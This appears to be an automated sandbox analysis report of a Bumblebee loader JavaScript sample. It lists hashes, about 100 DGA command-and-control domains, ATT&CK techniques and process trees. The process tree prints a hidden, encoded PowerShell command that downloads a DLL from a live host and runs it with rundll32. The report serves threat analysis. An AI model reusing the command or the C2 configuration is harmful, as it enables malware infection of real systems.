bumblebee | 3df813c5990e6bf7a841b1ecac9e224903e37a3f8e32d63b9816c3507aab5637

Analysis

max time kernel
270s
max time network
292s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
submitted
23-10-2024 02:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

23102024_0226_Report_1eed5c99-5474-4156-a3c8-a5537ffea449.js
Size

42KB
MD5

c77a5b4849df9ec7bdcdf970504c6bf5
SHA1

cea1a6eff08bf3c54eb889af265b0f62f6897cf9
SHA256

3df813c5990e6bf7a841b1ecac9e224903e37a3f8e32d63b9816c3507aab5637
SHA512

a24a3ca285cd942f1170f75ceb23a97c441cf7694b53af8e5c1c880e5ff6bbddde50f78e28a97785276998b5c7646ffccb34d5e2d0f13fe8a85acaa80f8bf98e
SSDEEP

768:2/OWgWxiLG0nMLTYFFd4SCEA4iuxbSHsH0G4SCS64TN+n6AmiY7BTER/Xzb1ql83:zBgR/Xzb1qblhoooLCk+TBUVDiwQ+pa2

Score

10^/10

bumblebee lnk001 discovery execution loader

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://mycocojamboo.com/bgfhfg/lGmEQCgpfT.dll

Extracted

Family

bumblebee

Botnet

lnk001

Attributes

dga
tvx1ovdepj8.life

acgr6r8zdot.life

ilofx941igp.life

8x2apo5m7ri.life

x9yrzer0ndt.life

93j4v4jopzd.life

ameagxzo2f7.life

nyy41uibsv5.life

ru4jvijdytq.life

l9t6r0y6cvi.life

f4vb9n3tdvh.life

9do3mcejztt.life

pxu1ajsdhqr.life

7exy2b231n2.life

vu5b47m18jn.life

6mnudp7zj73.life

p5047yjrb8q.life

d0xtxp89bb9.life

ygo9u1fkwux.life

fig3gj0v6qe.life

38f5wvwwn7o.life

txgogs9p8a1.life

uyn0icgx1kv.life

2z1ls31az7s.life

0cc2z8zrnhf.life

fsr2hskx44p.life

du19ek78tjw.life

234ct3lkozp.life

he8fq4k8d3w.life

7ewh8ltr7il.life

dw34kmgfl7t.life

f2j20ayqh8y.life

331k2rdkmmb.life

37z6li6l9y2.life

dpgs2lt1sbz.life

plll0xq4y82.life

bzc9sq2pz53.life

7r8ln1wswth.life

y9neib92f2m.life

m5iukps17y7.life

xo8be64ejh2.life

widn8soih8u.life

08mkuqnx6gv.life

lzeqr3apopn.life

o4m5a5no7e8.life

2u8znzsbrto.life

dxyob8x456a.life

lrugnff8fkc.life

38i6lh0rpze.life

mjb3r6mcs1f.life

vl41cymzzfq.life

qc4mwjiop45.life

z3z4fq0420z.life

0tab35o0swu.life

4izk0gc9is6.life

6brdh3p893b.life

736d0mvetjw.life

drmk5rdefb5.life

1v0xhie4os8.life

khxcp22s3dz.life

8z9m8hndrhp.life

xeoz1f1vjs0.life

lobavyclh8e.life

in4pzu7t2pv.life

j280b59doxz.life

6q894zusd4k.life

y7pzxau0717.life

bev8ymaajb7.life

glux8x5b8d6.life

yan95akxgqt.life

9qiliikd3sp.life

ge0lpqif3ar.life

ar7xakeve0o.life

eb4l6wisq9z.life

1grovn87c8s.life

wdga570b8pz.life

nzs8vi9w5o8.life

q7dfpyyhe08.life

exueqqmz3ia.life

65r8nx12fqr.life

vauy5ah65sx.life

8hjv8mbhrlj.life

eeqwg3mzq07.life

b1h0uaabzyz.life

8qvt5iabz5n.life

8ru044xed25.life

w8ligr695sd.life

3e6rrifr5fn.life

9f6p9g7x13s.life

ibcm5at6qrz.life

spd22scperm.life

4k59ij2ujeu.life

07zxfo0kere.life

nhdeapyfg7e.life

y0zvqpi42no.life

zdf5ki8x9r0.life

8mgj12azbyd.life

l6syolvczan.life

mk7plk9c6i2.life

hudrx8fn980.life
dga_seed
1016365528594956469
domain_length
11
num_dga_domains
100
port
443

rc4.plain

Signatures

BumbleBee
BumbleBee is a loader malware written in C++.
loader bumblebee
Bumblebee family
bumblebee

Blocklisted process makes network request 29 IoCs

flow	pid	Process
33	4524	rundll32.exe
128	4524	rundll32.exe
138	4524	rundll32.exe
152	4524	rundll32.exe
154	4524	rundll32.exe
156	4524	rundll32.exe
158	4524	rundll32.exe
162	4524	rundll32.exe
169	4524	rundll32.exe
173	4524	rundll32.exe
175	4524	rundll32.exe
183	4524	rundll32.exe
195	4524	rundll32.exe
197	4524	rundll32.exe
199	4524	rundll32.exe
201	4524	rundll32.exe
203	4524	rundll32.exe
206	4524	rundll32.exe
208	4524	rundll32.exe
211	4524	rundll32.exe
213	4524	rundll32.exe
215	4524	rundll32.exe
217	4524	rundll32.exe
219	4524	rundll32.exe
222	4524	rundll32.exe
225	4524	rundll32.exe
227	4524	rundll32.exe
230	4524	rundll32.exe
232	4524	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2884	powershell.exe
2916	powershell.exe
1576	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	wscript.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
224	api.ipify.org
225	api.ipify.org

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
2884	powershell.exe
2884	powershell.exe
2916	powershell.exe
2916	powershell.exe
1576	powershell.exe
1576	powershell.exe
1576	powershell.exe
1620	msedge.exe
1620	msedge.exe
4704	msedge.exe
4704	msedge.exe
5064	identity_helper.exe
5064	identity_helper.exe
5948	msedge.exe
5948	msedge.exe
5948	msedge.exe
5948	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2884	powershell.exe
Token: SeDebugPrivilege	2916	powershell.exe
Token: SeDebugPrivilege	1576	powershell.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3384 wrote to memory of 2884	3384	wscript.exe	84
PID 3384 wrote to memory of 2884	3384	wscript.exe	84
PID 2884 wrote to memory of 2916	2884	powershell.exe	86
PID 2884 wrote to memory of 2916	2884	powershell.exe	86
PID 2916 wrote to memory of 4524	2916	powershell.exe	99
PID 2916 wrote to memory of 4524	2916	powershell.exe	99
PID 3384 wrote to memory of 1576	3384	wscript.exe	104
PID 3384 wrote to memory of 1576	3384	wscript.exe	104
PID 1576 wrote to memory of 4704	1576	powershell.exe	106
PID 1576 wrote to memory of 4704	1576	powershell.exe	106
PID 4704 wrote to memory of 396	4704	msedge.exe	107
PID 4704 wrote to memory of 396	4704	msedge.exe	107
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 4380	4704	msedge.exe	108
PID 4704 wrote to memory of 1620	4704	msedge.exe	109
PID 4704 wrote to memory of 1620	4704	msedge.exe	109
PID 4704 wrote to memory of 1448	4704	msedge.exe	110
PID 4704 wrote to memory of 1448	4704	msedge.exe	110
PID 4704 wrote to memory of 1448	4704	msedge.exe	110
PID 4704 wrote to memory of 1448	4704	msedge.exe	110
PID 4704 wrote to memory of 1448	4704	msedge.exe	110
PID 4704 wrote to memory of 1448	4704	msedge.exe	110
PID 4704 wrote to memory of 1448	4704	msedge.exe	110
PID 4704 wrote to memory of 1448	4704	msedge.exe	110
PID 4704 wrote to memory of 1448	4704	msedge.exe	110
PID 4704 wrote to memory of 1448	4704	msedge.exe	110

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\23102024_0226_Report_1eed5c99-5474-4156-a3c8-a5537ffea449.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3384
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -w hidden -EncodedCommand JAB3AEEAMwBLADAAagB1AEgAPQAnAGgAdAB0AHAAcwA6AC8ALwBtAHkAYwBvAGMAbwBqAGEAbQBiAG8AbwAuAGMAbwBtAC8AYgBnAGYAaABmAGcALwBsAEcAbQBFAFEAQwBnAHAAZgBUAC4AZABsAGwAJwA7ACAAJAB0AEQATgBkAEkAVAA4AG0APQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXABzAEQAawBwAEQAMwBJADgAJwA7ACAAJABxAFoAWABkAGEASQBwADIAPQAkAHQARABOAGQASQBUADgAbQArACcAXABkAGwAbABmAGkAbABlAC4AZABsAGwAJwA7ACAAaQBmACAAKAAtAG4AbwB0ACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAdABEAE4AZABJAFQAOABtACkAKQAgAHsAIABOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHQARABOAGQASQBUADgAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAB9ADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIAAkAHcAQQAzAEsAMABqAHUASAAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJABxAFoAWABkAGEASQBwADIAOwAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAAJABxAFoAWABkAGEASQBwADIALABEAGwAbABSAGUAZwBpAHMAdABlAHIAUwBlAHIAdgBlAHIA
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2884
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -EncodedCommand JAB3AEEAMwBLADAAagB1AEgAPQAnAGgAdAB0AHAAcwA6AC8ALwBtAHkAYwBvAGMAbwBqAGEAbQBiAG8AbwAuAGMAbwBtAC8AYgBnAGYAaABmAGcALwBsAEcAbQBFAFEAQwBnAHAAZgBUAC4AZABsAGwAJwA7ACAAJAB0AEQATgBkAEkAVAA4AG0APQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXABzAEQAawBwAEQAMwBJADgAJwA7ACAAJABxAFoAWABkAGEASQBwADIAPQAkAHQARABOAGQASQBUADgAbQArACcAXABkAGwAbABmAGkAbABlAC4AZABsAGwAJwA7ACAAaQBmACAAKAAtAG4AbwB0ACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAdABEAE4AZABJAFQAOABtACkAKQAgAHsAIABOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHQARABOAGQASQBUADgAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAB9ADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIAAkAHcAQQAzAEsAMABqAHUASAAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJABxAFoAWABkAGEASQBwADIAOwAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAAJABxAFoAWABkAGEASQBwADIALABEAGwAbABSAGUAZwBpAHMAdABlAHIAUwBlAHIAdgBlAHIA
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2916
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\sDkpD3I8\dllfile.dll,DllRegisterServer
      4⤵
      Blocklisted process makes network request
      PID:4524
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden -C "start https://helpx.adobe.com/uk/acrobat/kb/install-updates-reader-acrobat.html"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1576
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://helpx.adobe.com/uk/acrobat/kb/install-updates-reader-acrobat.html
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:4704
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffbd73646f8,0x7ffbd7364708,0x7ffbd7364718
      4⤵
      PID:396
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,11345460678482431921,1268678839126136877,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
      4⤵
      PID:4380
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,11345460678482431921,1268678839126136877,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1620
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,11345460678482431921,1268678839126136877,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2924 /prefetch:8
      4⤵
      PID:1448
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11345460678482431921,1268678839126136877,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
      4⤵
      PID:428
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11345460678482431921,1268678839126136877,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
      4⤵
      PID:4288
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11345460678482431921,1268678839126136877,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1
      4⤵
      PID:3528
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11345460678482431921,1268678839126136877,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:1
      4⤵
      PID:3644
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,11345460678482431921,1268678839126136877,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5556 /prefetch:8
      4⤵
      PID:4004
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,11345460678482431921,1268678839126136877,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5556 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5064
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11345460678482431921,1268678839126136877,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
      4⤵
      PID:4420
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11345460678482431921,1268678839126136877,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
      4⤵
      PID:4552
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,11345460678482431921,1268678839126136877,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1048 /prefetch:2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5948

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5108

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1856

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
61e2e57471d559f5f6813c0a7995c075

SHA1
33c621541bc0892ddab1b65345a348c14af566e5

SHA256
c1acff9ad0b9cbb4f83f7953ec66d2ac7c37a6fa4a1474430fc1b04ad049231d

SHA512
9fb42b4b261b4114d113b7ea96ef33a0bade598332361499b97e5b92b72895f287f753d62d26ad86573ab9f56f1b052d2d4c61a4ccf287ef7d8e1c9363353a5c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
37f660dd4b6ddf23bc37f5c823d1c33a

SHA1
1c35538aa307a3e09d15519df6ace99674ae428b

SHA256
4e2510a1d5a50a94fe4ce0f74932ab780758a8cbdc6d176a9ce8ab92309f26f8

SHA512
807b8b8dc9109b6f78fc63655450bf12b9a006ff63e8f29ade8899d45fdf4a6c068c5c46a3efbc4232b9e1e35d6494f00ded5cdb3e235c8a25023bfbd823992d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d7cb450b1315c63b1d5d89d98ba22da5

SHA1
694005cd9e1a4c54e0b83d0598a8a0c089df1556

SHA256
38355fd694faf1223518e40bac1996bdceaf44191214b0a23c4334d5fb07d031

SHA512
df04d4f4b77bae447a940b28aeac345b21b299d8d26e28ecbb3c1c9e9a0e07c551e412d545c7dbb147a92c12bad7ae49ac35af021c34b88e2c6c5f7a0b65f6a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\11007ff5-e411-4fc1-a08d-14b75f9de421.tmp

Filesize
6KB

MD5
ce276052441c7e7cbe7de5668a74c583

SHA1
5a78dc8fcd2d0cffa36362a2381bd61393ed47fa

SHA256
14556f035f240e113b94bb4356e2d6e9469668e323e6746bc73445948569b195

SHA512
eb1e29e44b5752a0c5e5da04f8b9f0a80af8f3ce962266b143f225e1d79ae21d4ee62d32a749c3fa3a18dd880f561db82186835f6501e4a7bd044ee317d23e73

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
816B

MD5
8a7239cd2754ec673aab61a4067054b0

SHA1
14ccc042cbea48cf8a347a5bae758e284f6fcae7

SHA256
c891ffe38df3704a22edb90782bae86d5054811834178b2faba4909979e03e1a

SHA512
2a759a98ed60dc9a23907b78091761806fdd6e29d2a7e3e8351a45f9e09f8f5988e22851763e410d335486ed9fb827acfc72407265a53e4ed0bbf57b82233cfa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
ca75d998e420b121517669f4db304e52

SHA1
35e3106ae43f755531bc22db0fb57c6b7b86fad1

SHA256
4b2e12727069178bb9eab383192d5fdee4b8440c5e4830ea4f5ec7a9a4fff9ee

SHA512
ff42987a41233fd4a654a871b25914e8cb06b755a55f5fbf9b7ee07e0fff464b68af25cf39d480dd4fe205ce6f2ca5320bf7791d80297423e98136b011099455

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
44290a7e869409e0d6427fe4a1528d28

SHA1
59a5f6269314d4023cdad0dc7d717e889115f25a

SHA256
816ffbb746e87e75c7e966f2dc6dc9774464002b5cf9f8fbcec043e85d88ac1b

SHA512
a7dbd54a2d629b0ea12c8ae9c3c422457b21c011bdea0452d98d9d5657fabcd5a35ee764420d5731e4bdc778ad972fca2d286aa9bf9f4bd2ae4fb72c8df8d9ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
63157862bdd5ec71c8ee4b3c75e6a0e1

SHA1
fc826892075e8f872189fc4b2f3404f3d00349a8

SHA256
cb6d0fe848850ab39121bde12e176aa28f1d076d66ef928149c69b8ca963f2f9

SHA512
e41ef709578ed3b93ede4205c0f732f3f3a7a8dbdd446a0deb68237ec98a8ee9e8a63777ab59d7916183a5b92f41647112e505fd88b132c73c7a4285eab58e21

Download Submit
